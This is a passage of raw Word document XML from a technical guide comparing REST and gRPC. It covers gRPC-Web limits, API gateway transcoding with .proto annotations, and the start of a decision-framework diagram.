    <w:p w14:paraId="23158FE7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                     └──────────┘               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E6909" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E504920" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  External boundary: REST (universal, cacheable, browser-native) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591215B5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Internal boundary: gRPC (fast, typed, streaming)               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D7ACBA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>└────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0A2B98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Why this pattern dominates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47373FC2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1591"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:t>External APIs need maximum compatibility (REST + JSON works everywhere).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D95D1A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1591"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:t>Internal APIs need maximum performance (gRPC is 2-10x faster).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67984416" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1591"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:t>API Gateway translates between them (REST↔gRPC, or passes REST through).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5778F315" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1591"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:t>Best of both worlds: developer experience externally, performance internally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56124678" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 gRPC-Web (Browser Support)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16263B45" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC7917" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Problem: Browsers don't support native gRPC (no HTTP/2 bidirectional streaming from JS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007E5BF3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0A9A1EAC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Solution: gRPC-Web proxy (Envoy):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55975219" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Browser ──(gRPC-Web over HTTP/1.1 or HTTP/2)──→ Envoy Proxy ──(native gRPC)──→ Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29357578" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="02E83971" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>gRPC-Web limitations vs native gRPC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F0440C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ✓ Unary calls: fully supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196F4958" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ✓ Server streaming: supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5D7C4D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> Client streaming: not supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66766CD0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> Bidirectional streaming: not supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68395568" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8E5B8E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>For full streaming in browsers: use WebSocket or SSE alongside gRPC-Web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425B628D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.3 API Gateway Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E0A0C0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3283C450" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>REST → gRPC transcoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040EED62" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  API Gateway receives REST request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB5848B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    POST /v1/orders HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAAAE54" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {"customer_id": "42", "items": [...]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EE7A38" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D3AEE7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Gateway translates to gRPC call:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE9B7B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    OrderService.CreateOrder(CreateOrderRequest{customer_id: "42", items: [...]})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3A0BF3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE937A7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Returns REST response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7108DB5B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    HTTP/1.1 201 Created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD41C27" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {"order_id": "789", "status": "PENDING"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13490C2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="746474CE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Configured via annotations in .proto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE202F6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  import "google/api/annotations.proto";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15988896" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BCA794" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  service OrderService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B759E60" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    rpc CreateOrder(CreateOrderRequest) returns (Order) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4998E6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      option (google.api.http) = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647B8918" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        post: "/v1/orders"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724739E1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        body: "*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3184569D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFB91D6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A169F8D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    rpc GetOrder(GetOrderRequest) returns (Order) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F3B1C5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      option (google.api.http) = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF7D2B1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        get: "/v1/orders/{order_id}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715AC184" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BED067" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504DC52D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52922D4F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="4FE368ED">
          <v:rect id="_x0000_i6541" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE100FF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Decision Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF0138C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>12.1 Quick Decision Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2AC4B1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C88442" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>┌─────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186962A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│               WHO IS THE CLIENT?                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033BC053" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264DEC52" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166FDA2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  External (browsers, third-party, mobile) → REST        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C11359A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│    → Universal, cacheable, documented, discoverable     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B424591" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58737F60" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Internal (your microservices) → gRPC                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EA6C73" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│    → Fast, typed, streaming, code-generated              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794F6B2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CF1FF8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Both → REST externally, gRPC internally                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030A54B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│    → API Gateway translates at the boundary             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E60F8C7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2934AD48" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E87C78" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│               WHAT'S THE COMMUNICATION PATTERN?          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FBF537" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB0EDA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5375B329" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Simple CRUD → REST (natural resource model)            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6567105F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Real-time streaming → gRPC (native streaming)          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEBFC9B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  High-throughput pipeline → gRPC (performance)          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214695F6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Webhook/notification → REST (simple HTTP POST)         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF3B511" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  File upload/download → either (REST multipart or       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F761794" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                          gRPC client streaming)          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307370C4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B9ED89" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA94E9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│               WHAT MATTERS MOST?                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668F76F3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
